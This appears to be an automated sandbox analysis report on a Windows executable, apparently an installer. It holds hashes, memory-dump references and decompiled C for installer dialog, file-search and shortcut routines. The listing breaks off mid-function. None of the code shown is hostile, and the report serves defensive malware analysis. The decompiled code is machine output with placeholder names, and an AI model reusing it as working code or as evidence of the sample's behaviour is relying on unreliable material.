shlwapi.dll, xrefs: 0040428D
Py, xrefs: 004043B1
A, xrefs: 00404312
GetDiskFreeSpaceExA, xrefs: 004043C9
SHAutoComplete, xrefs: 00404288
KERNEL32.dll, xrefs: 004043CE

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
String ID: A$GetDiskFreeSpaceExA$KERNEL32.dll$Py$SHAutoComplete$shlwapi.dll
API String ID: 2007447535-1909522251
Opcode ID: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
Instruction ID: ef859d302125b71f7b9a0a5e3096057e4f4c42b01edd6451a005236750c2ec27
Opcode Fuzzy Hash: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
Instruction Fuzzy Hash: 0D819BB1900218BBDB11AFA1DC45BAF7BB8EF84314F00417AFA04B62D1D77C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004020A6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004020A6(void* __eflags) {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A9A(0xfffffff0);
				_t96 = E00402A9A(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45);
				if(E00405538(_t96) == 0) {
					E00402A9A(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407324, _t75, 1, 0x407314, _t44);
				if(_t44 < _t75) {
					L12:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407334, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							 *0x409418 = _t75;
							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409418, 0x400);
							_t69 =  *((intOrPtr*)(_t100 - 8));
							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409418, 1);
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L12;
					}
				}
				E00401428();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

0x004020af
0x004020b9
0x004020c2
0x004020cc
0x004020d5
0x004020df
0x004020e3
0x004020e3
0x004020e8
0x004020f9
0x00402101
0x004021df
0x004021df
0x004021e6
0x00402107
0x00402107
0x00402118
0x0040211c
0x00402122
0x0040212c
0x0040212e
0x00402139
0x0040213c
0x00402149
0x0040214b
0x0040214d
0x00402154
0x00402157
0x00402157
0x0040215a
0x00402164
0x0040216c
0x00402171
0x0040217d
0x0040217d
0x00402180
0x00402189
0x0040218c
0x00402195
0x0040219a
0x004021ac
0x004021b5
0x004021bb
0x004021c7
0x004021c7
0x004021c9
0x004021cf
0x004021cf
0x004021d2
0x004021d8
0x004021dd
0x004021f2
0x00000000
0x00000000
0x00000000
0x004021dd
0x004021e8
0x00402932
0x0040293e

APIs

CoCreateInstance.OLE32(00407324,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409418,00000400,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00402131

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-1943935188
Opcode ID: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
Instruction ID: 6da020dad1963d07c1d5d6cba7c730fbb78a3e39a4a6f028781d9f3b25516250
Opcode Fuzzy Hash: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
Instruction Fuzzy Hash: 0D417D75A00215BFCB00DFA8CD88E9E7BB6FF89315B20416AF905EB2D1CA759D41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004026BC, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004026BC(char __ebx, CHAR* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A9A(2), _t19 - 0x1a4) != 0xffffffff) {
					E0040591D(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E004059BF();
				} else {
					 *((char*)(__edi)) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004026d4
0x004026e8
0x004026f3
0x004026f4
0x00402855
0x004026d6
0x004026d6
0x004026d8
0x004026da
0x004026da
0x00402932
0x0040293e

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026CB

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
Instruction ID: fa0b3d5524a7ec5f3b356c4eb27d29c110ff1bfb4a1b37a6377ddf9626cce4e3
Opcode Fuzzy Hash: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
Instruction Fuzzy Hash: EBF0A0B2608110DBE701EBA49E49AEEB768DF52324F60417BE141B20C1D6B84A44DA2A

Uniqueness

Uniqueness Score: -1.00%

Function 02501872, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242361529.0000000002500000.00000040.00000001.sdmp, Offset: 02500000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
Instruction ID: 51b603fbc7db9cd22d2a635e2bbd4873502f43abb8d51d9862390b261b8e75fd
Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
Instruction Fuzzy Hash: A3014C78A10608EFCB40DF98CA8099DBBF4FF08320F518595E808E7711E330AE509B45

Uniqueness

Uniqueness Score: -1.00%

Function 0250165A, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242361529.0000000002500000.00000040.00000001.sdmp, Offset: 02500000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80

Uniqueness

Uniqueness Score: -1.00%

Function 004038BF, Relevance: 46.8, APIs: 31, Instructions: 347
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004038BF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t35;
				struct HWND__* _t37;
				struct HWND__* _t47;
				struct HWND__* _t65;
				struct HWND__* _t71;
				struct HWND__* _t84;
				struct HWND__* _t89;
				struct HWND__* _t97;
				int _t101;
				int _t104;
				struct HWND__* _t117;
				struct HWND__* _t120;
				signed int _t122;
				struct HWND__* _t127;
				long _t132;
				int _t134;
				int _t135;
				struct HWND__* _t136;
				void* _t139;

				_t135 = _a8;
				if(_t135 == 0x110 || _t135 == 0x408) {
					_t33 = _a12;
					_t117 = _a4;
					__eflags = _t135 - 0x110;
					 *0x79f56c = _t33;
					if(_t135 == 0x110) {
						 *0x7a2f84 = _t117;
						 *0x79f57c = GetDlgItem(_t117, 1);
						_t89 = GetDlgItem(_t117, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79e548 = _t89;
						E00403DA7(_t117);
						SetClassLongA(_t117, 0xfffffff2,  *0x7a2768);
						 *0x7a274c = E00401410(4);
						_t33 = 1;
						__eflags = 1;
						 *0x79f56c = 1;
					}
					_t120 =  *0x409284; // 0xffffffff
					_t132 = (_t120 << 6) +  *0x7a2fa0;
					__eflags = _t120;
					if(_t120 < 0) {
						L38:
						E00403DF3(0x40b);
						while(1) {
							_t35 =  *0x79f56c;
							 *0x409284 =  *0x409284 + _t35;
							_t132 = _t132 + (_t35 << 6);
							_t37 =  *0x409284; // 0xffffffff
							__eflags = _t37 -  *0x7a2fa4;
							if(_t37 ==  *0x7a2fa4) {
								E00401410(1);
							}
							__eflags =  *0x7a274c;
							if( *0x7a274c != 0) {
								break;
							}
							__eflags =  *0x409284 -  *0x7a2fa4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_push( *((intOrPtr*)(_t132 + 0x24)));
							_t122 =  *(_t132 + 0x14);
							_push(0x7ab000);
							E004059E1(_t117, _t122, _t132);
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E00403DA7(_t117);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E00403DA7(_t117);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E00403DA7(_t117);
							_t47 = GetDlgItem(_t117, 3);
							__eflags =  *0x7a300c;
							_t136 = _t47;
							if( *0x7a300c != 0) {
								_t122 = _t122 & 0x0000fefd | 0x00000004;
								__eflags = _t122;
							}
							ShowWindow(_t136, _t122 & 0x00000008);
							EnableWindow(_t136, _t122 & 0x00000100);
							E00403DC9(_t122 & 0x00000002);
							EnableWindow( *0x79e548, _t122 & 0x00000004);
							SendMessageA(_t136, 0xf4, 0, 1);
							__eflags =  *0x7a300c;
							if( *0x7a300c == 0) {
								_push( *0x79f57c);
							} else {
								SendMessageA(_t117, 0x401, 2, 0);
								_push( *0x79e548);
							}
							E00403DDC();
							E004059BF(0x79f580, 0x7a2780);
							_push( *((intOrPtr*)(_t132 + 0x18)));
							_push( &(0x79f580[lstrlenA(0x79f580)]));
							E004059E1(_t117, 0, _t132);
							SetWindowTextA(_t117, 0x79f580);
							_push(0);
							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)));
							__eflags = _t65;
							if(_t65 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t65;
								if( *_t132 == _t65) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x7a2758);
									 *0x79ed58 = _t132;
									__eflags =  *_t132;
									if( *_t132 > 0) {
										_t71 = CreateDialogParamA( *0x7a2f80,  *_t132 +  *0x7a2760 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);
										__eflags = _t71;
										 *0x7a2758 = _t71;
										if(_t71 != 0) {
											_push( *((intOrPtr*)(_t132 + 0x2c)));
											_push(6);
											E00403DA7(_t71);
											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
											ScreenToClient(_t117, _t139 + 0x10);
											SetWindowPos( *0x7a2758, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
											_push(0);
											E0040136D( *((intOrPtr*)(_t132 + 0xc)));
											ShowWindow( *0x7a2758, 8);
											E00403DF3(0x405);
										}
									}
									goto L58;
								}
								__eflags =  *0x7a300c - _t65;
								if( *0x7a300c != _t65) {
									goto L61;
								}
								__eflags =  *0x7a3000 - _t65;
								if( *0x7a3000 != _t65) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7a2758);
						 *0x7a2f84 =  *0x7a2f84 & 0x00000000;
						__eflags =  *0x7a2f84;
						EndDialog(_t117,  *0x79e950);
						goto L58;
					} else {
						__eflags = _t33 - 1;
						if(_t33 != 1) {
							L37:
							__eflags =  *_t132;
							if( *_t132 == 0) {
								goto L61;
							}
							goto L38;
						}
						_push(0);
						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)));
						__eflags = _t84;
						if(_t84 == 0) {
							goto L37;
						}
						SendMessageA( *0x7a2758, 0x40f, 0, 1);
						__eflags =  *0x7a274c;
						return 0 |  *0x7a274c == 0x00000000;
					}
				} else {
					_t117 = _a4;
					if(_t135 == 0x47) {
						SetWindowPos( *0x79f560, _t117, 0, 0, 0, 0, 0x13);
					}
					if(_t135 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x79f560,  ~(_a12 - 1) & _t135);
					}
					if(_t135 != 0x40d) {
						__eflags = _t135 - 0x11;
						if(_t135 != 0x11) {
							__eflags = _t135 - 0x10;
							if(_t135 != 0x10) {
								L14:
								__eflags = _t135 - 0x111;
								if(_t135 != 0x111) {
									L30:
									return E00403E0E(_t135, _a12, _a16);
								}
								_t134 = _a12 & 0x0000ffff;
								_t127 = GetDlgItem(_t117, _t134);
								__eflags = _t127;
								if(_t127 == 0) {
									L17:
									__eflags = _t134 - 1;
									if(_t134 != 1) {
										__eflags = _t134 - 3;
										if(_t134 != 3) {
											__eflags = _t134 - 2;
											if(_t134 != 2) {
												L29:
												SendMessageA( *0x7a2758, 0x111, _a12, _a16);
												goto L30;
											}
											__eflags =  *0x7a300c;
											if( *0x7a300c == 0) {
												_t97 = E00401410(3);
												__eflags = _t97;
												if(_t97 != 0) {
													goto L30;
												}
												 *0x79e950 = 1;
												L25:
												_push(0x78);
												L26:
												E00403D80();
												goto L30;
											}
											E00401410(_t134);
											 *0x79e950 = _t134;
											goto L25;
										}
										__eflags =  *0x409284;
										if( *0x409284 <= 0) {
											goto L29;
										}
										_push(0xffffffff);
										goto L26;
									}
									_push(1);
									goto L26;
								}
								SendMessageA(_t127, 0xf3, 0, 0);
								_t101 = IsWindowEnabled(_t127);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L61;
								}
								goto L17;
							}
							__eflags =  *0x409284 -  *0x7a2fa4 - 1; // 0xffffffff
							if(__eflags != 0) {
								goto L30;
							}
							_t104 = IsWindowEnabled( *0x79e548);
							__eflags = _t104;
							if(_t104 != 0) {
								goto L30;
							}
							_t135 = 0x111;
							_a12 = 1;
							goto L14;
						}
						SetWindowLongA(_t117, 0, 0);
						return 1;
					} else {
						DestroyWindow( *0x7a2758);
						 *0x7a2758 = _a12;
						L58:
						if( *0x7a0580 == 0 &&  *0x7a2758 != 0) {
							ShowWindow(_t117, 0xa);
							 *0x7a0580 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x004038c9
0x004038d1
0x00403a4a
0x00403a4e
0x00403a52
0x00403a54
0x00403a59
0x00403a64
0x00403a6f
0x00403a74
0x00403a76
0x00403a78
0x00403a7b
0x00403a80
0x00403a8e
0x00403a9b
0x00403aa2
0x00403aa2
0x00403aa3
0x00403aa3
0x00403aa8
0x00403ab5
0x00403abb
0x00403abd
0x00403afd
0x00403b02
0x00403b07
0x00403b07
0x00403b0c
0x00403b15
0x00403b17
0x00403b1c
0x00403b22
0x00403b26
0x00403b26
0x00403b2b
0x00403b32
0x00000000
0x00000000
0x00403b3d
0x00403b43
0x00000000
0x00000000
0x00403b49
0x00403b4c
0x00403b4f
0x00403b54
0x00403b59
0x00403b5c
0x00403b62
0x00403b67
0x00403b6a
0x00403b70
0x00403b75
0x00403b78
0x00403b7e
0x00403b86
0x00403b8c
0x00403b93
0x00403b95
0x00403b9c
0x00403b9c
0x00403b9c
0x00403ba6
0x00403bb5
0x00403bc1
0x00403bd0
0x00403be7
0x00403be9
0x00403bef
0x00403c04
0x00403bf1
0x00403bfa
0x00403bfc
0x00403bfc
0x00403c0a
0x00403c1a
0x00403c1f
0x00403c2a
0x00403c2b
0x00403c32
0x00403c38
0x00403c3c
0x00403c41
0x00403c43
0x00000000
0x00403c49
0x00403c49
0x00403c4b
0x00000000
0x00000000
0x00403c51
0x00403c55
0x00403c7a
0x00403c80
0x00403c86
0x00403c89
0x00403caf
0x00403cb5
0x00403cb7
0x00403cbc
0x00403cc2
0x00403cc5
0x00403cc8
0x00403cdf
0x00403ceb
0x00403d06
0x00403d0c
0x00403d10
0x00403d1d
0x00403d28
0x00403d28
0x00403cbc
0x00000000
0x00403c89
0x00403c57
0x00403c5d
0x00000000
0x00000000
0x00403c63
0x00403c69
0x00000000
0x00000000
0x00000000
0x00403c6f
0x00403c43
0x00403d35
0x00403d41
0x00403d41
0x00403d49
0x00000000
0x00403abf
0x00403abf
0x00403ac2
0x00403af5
0x00403af5
0x00403af7
0x00000000
0x00000000
0x00000000
0x00403af7
0x00403ac4
0x00403ac8
0x00403acd
0x00403acf
0x00000000
0x00000000
0x00403adf
0x00403ae7
0x00000000
0x00403aed
0x004038e3
0x004038e3
0x004038ea
0x004038fb
0x004038fb
0x00403904
0x0040390d
0x00403918
0x00403918
0x00403924
0x00403940
0x00403943
0x00403958
0x0040395b
0x00403990
0x00403990
0x00403996
0x00403a37
0x00000000
0x00403a40
0x0040399c
0x004039af
0x004039b1
0x004039b3
0x004039d0
0x004039d3
0x004039d5
0x004039da
0x004039dd
0x004039ec
0x004039ef
0x00403a22
0x00403a35
0x00000000
0x00403a35
0x004039f1
0x004039f8
0x00403a11
0x00403a16
0x00403a18
0x00000000
0x00000000
0x00403a1a
0x00403a06
0x00403a06
0x00403a08
0x00403a08
0x00000000
0x00403a08
0x004039fb
0x00403a00
0x00000000
0x00403a00
0x004039df
0x004039e6
0x00000000
0x00000000
0x004039e8
0x00000000
0x004039e8
0x004039d7
0x00000000
0x004039d7
0x004039bf
0x004039c2
0x004039c8
0x004039ca
0x00000000
0x00000000
0x00000000
0x004039ca
0x00403963
0x00403969
0x00000000
0x00000000
0x00403975
0x0040397b
0x0040397d
0x00000000
0x00000000
0x00403983
0x00403988
0x00000000
0x00403988
0x0040394a
0x00000000
0x00403926
0x0040392c
0x00403936
0x00403d4f
0x00403d56
0x00403d64
0x00403d6a
0x00403d6a
0x00403d74
0x00000000
0x00403d74
0x00403924

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038FB
ShowWindow.USER32(?), ref: 00403918
DestroyWindow.USER32 ref: 0040392C
SetWindowLongA.USER32 ref: 0040394A
IsWindowEnabled.USER32 ref: 00403975
GetDlgItem.USER32 ref: 004039A3
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039BF
IsWindowEnabled.USER32(00000000), ref: 004039C2
GetDlgItem.USER32 ref: 00403A6A
GetDlgItem.USER32 ref: 00403A74
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A8E
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403ADF
GetDlgItem.USER32 ref: 00403B86
ShowWindow.USER32(00000000,?), ref: 00403BA6
EnableWindow.USER32(00000000,?), ref: 00403BB5
EnableWindow.USER32(?,?), ref: 00403BD0
SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403BE7
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BFA
lstrlenA.KERNEL32(0079F580,?,0079F580,007A2780), ref: 00403C23
SetWindowTextA.USER32(?,0079F580), ref: 00403C32
ShowWindow.USER32(?,0000000A), ref: 00403D64

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
String ID:
API String ID: 3950083612-0
Opcode ID: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
Instruction ID: 5dd3c4f218cf3e404d6a97a2e5ce8d1cdd0b8388a563f9de6f37f2f8e87629b5
Opcode Fuzzy Hash: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
Instruction Fuzzy Hash: 9DC1CC70904200AFD720AF25ED45E277FADEB89706F00453AF641B52F2D67DAA42CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00403EEF, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00403EEF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x79f568 =  *0x79f568 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E0E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x7a1f20;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x7a2f84, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x7a2f84, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x79f568 != 0) {
						goto L25;
					} else {
						_t112 =  *0x79ed58 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403DC9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040417A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x7a275c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x7a2fb8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403EBB;
				E00403DA7(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403DA7(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403DC9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403DDC(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x7a2f88 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x79e54c =  *0x79e54c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x79f568 =  *0x79f568 & 0x00000000;
				return 0;
			}

0x00403eff
0x00404025
0x00404081
0x00404085
0x0040415c
0x0040415e
0x0040415e
0x00404164
0x00404164
0x00404167
0x00000000
0x0040416e
0x00404093
0x00404095
0x0040409f
0x004040aa
0x004040ad
0x004040b0
0x004040bb
0x004040be
0x004040c5
